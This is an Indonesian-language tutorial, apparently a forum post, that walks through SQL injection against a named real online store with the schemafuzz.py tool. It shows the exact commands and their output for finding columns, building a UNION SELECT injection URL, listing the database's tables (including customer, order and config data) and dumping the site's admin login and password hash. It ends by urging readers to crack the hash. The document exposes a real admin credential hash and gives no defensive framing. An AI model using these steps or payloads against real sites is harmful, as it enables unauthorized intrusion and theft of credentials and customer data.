Bahan-bahan yg harus disiapkan :
1.Python
2.Schemafuzzz.py
3.CMD

Gunakan CMD , masuk ke folder schemafuzz.py
Dengan perintah >> schemafuzz.py -u “target” –perintah

Utk lebih jelasnya,,langsung ke TKP ,, wkwkwkwk

1.Cari target ,, ini target kita >>>
http://www.sleeppost.com/viewproduct.php?pid=923

2.Cek columnnya
schemafuzz.py -u “http://www.sleeppost.com/viewproduct.php?pid=923” –findcol

maka akan keluar :


+] URL: http://www.sleeppost.com/viewproduct.php?pid=923–
+] Evasion Used: “+” “–”
+] 09:44:10
-] Proxy Not Given
+] Attempting To find the number of columns…
+] Testing: 0,1,2,3,4,5,6,
+] Column Length is: 7
+] Found null column at column #: 0
+] SQLi URL: http://www.sleeppost.com/viewproduct.ph … +UNION+SEL
CT+0,1,2,3,4,5,6–
+] darkc0de URL: http://www.sleeppost.com/viewproduct.ph … +1=2+UNION
SELECT+darkc0de,1,2,3,4,5,6
-] Done!

Nah kita gunakan ini http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6
utk nginject.

3.Cari db nya
schemafuzz.py -u “http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6” –dbs


[+] URL: http://www.sleeppost.com/viewproduct.ph … N+SELECT+d
arkc0de,1,2,3,4,5,6–
[+] Evasion Used: “+” “–”
[+] 09:56:47
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 1

[0] ??sleeppo_store?

[-] 09:57:00
[-] Total URL Requests 3
[-] Done

Tuh kan keliatan db nya,,wkwkwkkw sleeppo_store

4.Cari nama tabel dalam db
schemafuzz.py -u “http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6” –schema -D sleeppo_store


[+] URL: http://www.sleeppost.com/viewproduct.ph … N+SELECT+d
arkc0de,1,2,3,4,5,6–
[+] Evasion Used: “+” “–”
[+] 10:02:56
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Showing Tables & Columns from database “sleeppo_store”
[+] Number of Tables: 20

[Database]: sleeppo_store
[Table: Columns]

[0]advertisement: id,image,url
[1]brands: name
[2]category: cid,parent,name
[3]config: adminemail1,adminemail2,adminemail3,salesemail,enquiryemail,adminlogi
n,adminpassword,orderemailsubject,orderemailheader,orderemailfooter,orderwebhead
er,orderwebfooter,sms
[4]emailgroup: gid,name
[5]emailgroupmember: gid,email
[6]emails: email,name
[7]faqreply: fid,faqquestion,faqanswer,fdate
[8]faqrequest: fid,email,faqquestion,fdate,status,name,contact
[9]news: nid,title,detail,ndate,link_cid,link_pid,active
[10]orderitem: ordernum,pid,pname,vid,brand,variance,price,sellprice,discount,qty,type
[11]orders: ordernum,name,email,contact,address,status,country,ddate,dname,demai
l,dcontact,daddress,dcountry,paytype,worldpayid,ttime,remarks,refno,deliverydate
,deliverytime,paymentmode,remarks2
[12]outlet: outlet_id,outlet_name,outlet_address,outlet_tel
[13]product: pid,cid,brand,name,pno,detail,recommend
[14]productrel: pid,vtype,variance
[15]productvariance: vid,pid,variance,thick,vtype,vno,detail,price,sellprice,firm,colour
[16]promotionitems: id,promotion_id,item_type,cid,brand,pid,vid,discount,rating
[17]promotions: promotion_id,title,detail,startdate,enddate
[18]users: uid,name,email,contact,address
[19]warranty: wid,name,address,email,submitdate,date,invoice,model,size,period,s
urvey,qty

[-] 10:24:51
[-] Total URL Requests 139
[-] Done

Berarti itu site punya 20 tabel,kolomnya juga ada tuh.Tinggal pilih yg mana yg mau di exploit :p

5.Exploit tabel n kolom
schemafuzz.py -u “http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6” –dump -D sleeppo_store -T config -C adminlogin,adminpassword


[+] URL: http://www.sleeppost.com/viewproduct.ph … N+SELECT+d
arkc0de,1,2,3,4,5,6–
[+] Evasion Used: “+” “–”
[+] 10:36:59
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Dumping data from database “sleeppo_store” Table “config”
[+] and Column(s) [‘adminlogin’, ‘adminpassword’]
[+] Number of Rows: 3

[0] liphong:16a8c2870e2d639a58e46bfd58ff9c5c:NoDataInColumn:
[1] No data
[2] No data
[3] No data

[-] 10:37:36
[-] Total URL Requests 5
[-] Done

xixixi…itu user ama passnya udah kliatan,,passnya tgl di decrypt aje wink

Cara diatas berlaku untuk sql versi 5 , utk versi 4 gunakan perintah –fuzz untuk menemukan nama tabel n kolom

ex : schemafuzz.py -u “http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6” –fuzz

Beberapa perintah :
–fuzz >>> mencari nama kolom n tabel pada sql v 4
–schema >>> melihat nama tabel
–dump >>> melihat isi kolom
–findcol >>> menemukan dakc0de ( colom )

Silahkan cari yg laen.Baca aja help nya

download
Python
Schemafuzz.py